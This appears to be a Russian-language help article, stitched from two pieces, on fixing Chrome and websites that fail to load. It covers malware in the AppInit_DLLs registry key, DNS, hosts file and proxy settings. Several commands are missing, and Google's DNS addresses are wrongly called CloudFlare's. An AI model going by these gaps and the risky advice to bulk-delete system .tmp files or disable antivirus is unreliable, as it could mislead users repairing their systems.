    Проверка реестра Windows на вирус не открывающий вкладки Chrome

    Далее вам необходимо перейти в раздел реестра:

    В данном разделе вам необходимо найти ключ «AppInit_DLLs». В нормальном состоянии у него не должно быть ни каких значений. Если же у вас тут будет, что-то прописано, то это зловред.

    Вирус не открывает вкладки Chrome ("AppInit_DLLs")

    Предположим, что у вас в AppInit_DLLs приписана библиотека tvhihgf.dll или uebgeyj.dll, но могут быть и другие. Выгляди, это вот так:

    Поиск вируса из-за которого не открываются вкладки в Chrome

    Обязательно запишите себе имя библиотеки, оно нам пригодится, чтобы потом его найти на диске. Теперь зная зловреда, нам нужно открыть ключ AppInit_DLLs и удалить из него все, что тут прописано.

    Гугл Хром не открывает страницы

    Следующим шагом, вам необходимо открыть проводник Windows и произвести поиск по нужному имени. Как только будет обнаружен файл, вам необходимо его удалить.

    Не открываются сайты в Google Chrome

    Так же я вам советую почистить в папках C:\windows\system32 (для 32 битной Windows) и C:\windows\SYSWOW64 (на 64 битной Windows) все файлы с расширением .tmp, так как они могут содержать резервную копию трояна Trojan.Mayachok. Обязательно перезагрузите компьютер. Кстати вирусы можно поискать встроенными средствами браузера.

    Проверка системы на вредоносное ПО через Chrome

    У современной версии Chrome есть встроенная проверка на вредоносные приложения и ПО, которое мешает нормальной работе браузера, в теории, это так же может устранять ошибку с белым экраном смерти и сообщением «произошел сбой» при открытии страницы. В правом верхнем углу откройте настройки браузера.

    Запуск настроек в Google Chrome

    Выберите «Дополнительные — Сброс настроек и удаление вредоносного ПО — Удалить вредоносное ПО с компьютера«

    Проверка системы на вредоносное ПО через Chrome

    Браузер Chrome может найти вредоносные программы на вашем компьютере и удалить их, просто нажимаем кнопку «Найти«.

    Браузер Chrome может найти вредоносные программы на вашем компьютере и удалить их

    Google Chrome дает сбой во всем мире на ПК с Windows 10 (Обновление 22.05.2021)

    Google Chrome вчера неожиданно начал давать сбой для многих пользователей Windows по всему миру, что сделало браузер непригодным для использования. Google выпустил Chrome 90.0.4430.212 10, и по большей части до вчерашнего дня не было сообщений о проблемах с выпуском. Кроме того, пользователи сообщают, что эти сбои происходят как в обычном режиме просмотра, так и в режиме инкогнито.

    Одним из решений данной проблемы является пересоздание папки в пользовательском профиле. Закройте все процессы Chroem. Далее в проводнике Wundows откройте папку:

    Удалите файл «Local State«

    chrome crashed

    Повторно откройте Chrome. Если данный метод не помогает, то я советую так же сделать копию папки User Data, а затем ее переименовать, например в User Data_old

    Переименовывание папки User Data в Chrome

    Повторно откройте Chrome.

    Перейдите на Chrome Canary

    Пока идет вся эта катавасия со сбое и открытием страниц в Chrome, я вам советую пока Google выпустит обновление перейти на версию Canary, она новее актуальной версии как минимум на два релиза, и она лишена данной ошибки. Где скачать и как установить Chrome Canary читайте по ссылке. Надеюсь вам это поможет убрать ошибку, когда произошел сбой при открытии браузера или страницы.

    Посмотреть причину сбоя Chrome

    Так же вы можете открыть ссылку:

    Возможно там будет информация, которая сможет вам найти причину, будет что погуглить.

    Страница chrome://crashes/ в Chrome

    Так же может быть ситуация, что есть конфликт модулей, проверить это можно на специальной странице:

    Что делать если на компьютере не загружаются сайты

    Прекрасное бодрое утро, включаю компьютер, открываю свой любимый браузер, а сайты не открываются! Какой-то определённый, много разных или вообще все. Блин, что делать? В этой статье и поговорим об этой довольно распространённой проблеме, возможных причинах и решениях.

    Забегая немного вперёд, скажу, что в 95% случаях причиной ошибок являются DNS-сервера или действия/остаточные эффекты от работы вирусов на вашем компьютере или ноутбуке. Есть и хорошая новость �� Скорее всего, я помогу вам быстро решить проблему без переустановки Windows или вызова специалиста на дом. Поехали!

    Для нетерпеливых вот видео:

    Сначала проверим работает ли интернет

    Логично предположить, что интернет просто не работает. Проверить это довольно просто. Посмотрите на значок скайпа, зелёный ли он, или попробуйте обновить свой антивирус. В общем, проверьте работает ли любое отдельное приложение которое вы себе устанавливали, кроме браузера, которое использует интернет. Это самый простой способ сразу понять что происходит.

    Если таких нет, то нужно открыть командную строку и ввести туда команду:

    Если после её выполнения вы видите четыре сообщения «Ответ от ..», значит доступ к интернету есть. А если сообщения «Превышен интервал ожидания…», то 100% именно здесь проблема. Подробнее об этом и как решать читайте в статье про проблемы с работой интернета и по неполадкам с wifi.

    Допустим приложения работают, команда «ping 8.8.8.8» получает ответы, но сайты не открываются. Следующим шагом нужно проверить работает ли DNS. Этот сервис переводит имена сайтов (домены) в IP-адреса. Введите такую команду:

    Также смотрим что пишет в ответ. Единственно правильный вариант:

    Команда ping mail.ru

    Цифры могут быть другие, но главное, чтобы четыре сообщения начинались с «Ответ от ..». Если ответы есть, то с DNS всё в порядке. Если, допустим, не четыре ответа, а меньше (но они есть), то проблема в качестве интернета. Возможно, у вас мобильный инет и качество связи на данный момент оставляет желать лучшего)

    Осталось рассмотреть вариант, когда ответов не получили. В принципе, в данный момент можно заходить на сайты, если вы знаете их IP-адрес �� Ради интереса можете ввести в адресную строку браузера: 94.100.180.200

    Должен открыться сайт mail.ru. Но проблему DNS надо решать и об этом дальше.

    Решение проблемы с распознаванием имён (DNS)

    Два слова о возникновении проблемы. Иногда DNS сервер провайдера глючит, и в этом случае лучше заменить его на более надёжный сервер от Google или CloudFlare. Но по умолчанию, когда происходит подключение к интернету, выставляется DNS-сервер провайдера. Менять или не менять зависит от частоты возникновения проблемы. Также частой причиной являются вирусы, они могут подменять значения на свои.

    Для изменения адресов на гугловские, кликаем правой кнопкой на значок сети в углу возле часиков (в виде компьютера или связи Wi-Fi) и выбираем «Центр управления сетями и общим доступом»:

    Открываем центр управления сетями

    В Windows 7/8.1/10 нужно зайти в «Панель управления -> Сеть и интернет -> Центр управления сетями и общим доступом» . Далее кликаем по своему подключению как показано стрелочкой (у вас может называться по-другому):

    Настройки сети

    В следующем окошке нажимаем кнопку «Свойства» и далее находим в списке «Протокол интернета версии 4» и заходим в него двойным кликом.

    Далее переставляем переключатель в положение «Использовать следующие адреса DNS-серверов» и вписываем в поля адреса DNS-серверов Google: 8.8.8.8 и 8.8.4.4

    Это будут новые более быстрые DNS от CloudFlare. Можно не перезагружаться, через минуту новые настройки начнут работать. Если какие-то IP-адреса уже были прописаны, тогда наоборот, пробуем сначала поставить галочку на «Получить адрес DNS-сервера автоматически» :

    Проверьте открываются ли теперь сайты. Если нет, то введите ещё такое в командной строке, запущенной от имени администратора:

    Перезагрузитесь и проверяйте.

    Если у вас есть роутер, то будет лучше менять параметры прямо в нём. В этом случае нужно зайти в админ-панель роутера и найти настройки сети. На каждом роутере они расположены по разному, здесь универсального совета я не дам, но покажу на примере роутера TP-Link:

    Меняем DNS на адреса Google в роутере

    Нужно найти поля, отвечающие за DNS: Primary (основной) и Secondary (резервный) DNS, поставить галочку чтобы использовать их (Use this DNS servers) и вписать туда IP-адреса в точности как на картинке: 8.8.8.8 и 8.8.4.4. Сохранить настройки и перезагрузить роутер.

    Неверный файл «hosts», не открываются некоторые сайты

    Проблема с распознаванием имён сайтов в IP-адреса может быть не только из-за глючного DNS. Даже, наверное, чаще это происходит из-за испорченного файла «hosts», который расположен в системной папке Windows любых версий. Чтобы справиться с этой проблемой изучите статью про решение проблемы с неоткрывающимся сайтом «ВКонтакте». В принципе, не только этот, а и все остальные советы в статье также помогут, если не работают любые другие сайты.

    Лечение системы от вирусов

    Сама проблема с испорченным файлом «hosts» в большинстве случаев вызвана работой вирусов на вашем компьютере. Выводы сделайте сами �� (подсказка – срочно проверьтесь антивирусом!). Да и вообще проблема с сайтами часто связана с вирусами. Поэтому, особенно уделите внимание сканированию компьютера на наличие вредоносных файлов с помощью программы Malwarebytes Antimalware, о которой рассказано по ссылке выше.

    Второй простой способ провериться – это скачать лечащую утилиту Drweb CureIt!

    Программы нужно сохранить на флешку с рабочего компьютера, и запустить на проблемном.

    Интернет работает, проблемы с браузерами

    Итак, определились что с интернетом всё в порядке, значит нужно смотреть в сторону своего браузера. Сперва-наперво проверьте как открываются сайты в разных браузерах, проблема в каком-то одном или у всех. Если в каком-то конкретном, то выводы очевидны – нужно колупаться именно в его настройках.

    Обычно установлен стандартный Internet Explorer/Edge и один из браузеров Google Chrome, Opera, Mozilla Firefox или Яндекс-браузер. Попробуйте полностью удалить и заново установить свой браузер. Учтите, что IE/Edge удалить невозможно, он встроен в Windows. Если у вас только один браузер, то скачайте другие, возможно, подберёте себе что-нибудь получше ��

    Проверьте какие расширения установлены в браузере, отключите лишние. Возможно, что-то там установилось без вашего ведома �� Поотключайте недавно установленные расширения, часто какое-то из них и является причиной проблемы. Очистите кэш и вообще всю историю браузера.

    Проверьте, может быть в браузере включена опция ускорения интернета. Обычно она называется «Турбо» или встроенный VPN. В этом случае не все сайты могут грузиться одинаково хорошо, отключите Турбо-режим.

    Прописан прокси-сервер

    Распространённая проблема – неверно прописанный прокси-сервер. А вообще на домашних компьютерах прокси-сервер почти никогда не используется, поэтому если он прописан, будем просто убирать его.

    Большинство современных браузеров избавились от локальной настройки прокси-серверов и используют системные настройки, которые прописываются в браузере Internet Explorer или Edge. Кстати, именно в IE я советую проверять нормально ли грузятся сайты, а затем уже переходить к своему любимому браузеру, если это не IE)

    Открываем свойства браузера Internet Explorer, вкладка «Подключения», кнопка «Настройка сети»

    Настройки прокси-сервера

    Выставляем всё как на скриншоте, должна быть всего одна галочка «Автоматическое определение параметров». На всякий случай сохраните прежние настройки. Если данный шаг не поможет, то лучше верните всё как было. Сохраняем настройки и смотрим что получилось.

    Повреждённый протокол TCP/IP

    Двигаемся дальше, следующим шагом мы починим главный протокол интернета – TCP/IP. Сделать это просто, и ничего не изменится даже если дело не в этом. В командной строке нужно прописать две команды:

    netsh winsock reset

    Эти команды касаются работы интернета на компьютере в целом. Это важный пункт, сделайте всё как там написано.

    Исправление системных параметров утилитой AVZ

    Более продвинутый метод борьбы с нашим недугом, если предыдущие пункты не дали результата. Нужно скачать утилиту AVZ и запустить ярлык программы с помощью правой кнопки, выбрав пункт «Запуск от имени администратора».

    В окне программы идём в меню «Файл -> Восстановление системы» и отмечаем галочками пункты как на скриншоте:

    Если не открываются сайты используем AVZ

    Нажимаем «Выполнить отмеченные операции». Программа AVZ всё сделает, кстати, в том числе исправит файл hosts, если вы этого ещё не делали, и пропишет гугловские DNS в системных параметрах компьютера. Перед выполнением этих действий рекомендую создать точку восстановления системы.

    Лезем в реестр

    Реже, но попробовать стоит, тем более, если деваться то некуда �� Открываем реестр Windows: нажимаем кнопки «Win + R» и пишем там «regedit».

    В окне редактора реестра нужно пройти по такому пути «HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows»

    и посмотреть есть ли справа параметр «Appinit_DLLs»

    Проблема в реестре

    Скопируйте куда-нибудь то что там прописано и сотрите значение, т.е. обнулите его. Теперь то же самое проделайте с веткой «HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows» .

    Перезагрузитесь и проверьте заходит ли на сайты. Если не помогло, то лучше вернуть прежние значения назад.

    Если ничего не помогло

    Бывает что ничего не помогает, но решение проблемы лежит на поверхности. А причиной может ещё быть:

    • Ваш антивирус блокирует работу некоторых сайтов. Отключите его на время и проверьте
    • Восстановите параметры системы из точки восстановления на ближайшую дату, когда страницы ещё открывались
    • Перезагрузите роутер
    • Позвоните своему провайдеру и спросите, нет ли сейчас проблем
    • Просто подождите пол часика ��

    На этом всё, если есть какие-то вопросы или дополнения, то добро пожаловать в комментарии.

Добавить комментарий

Ваш адрес email не будет опубликован.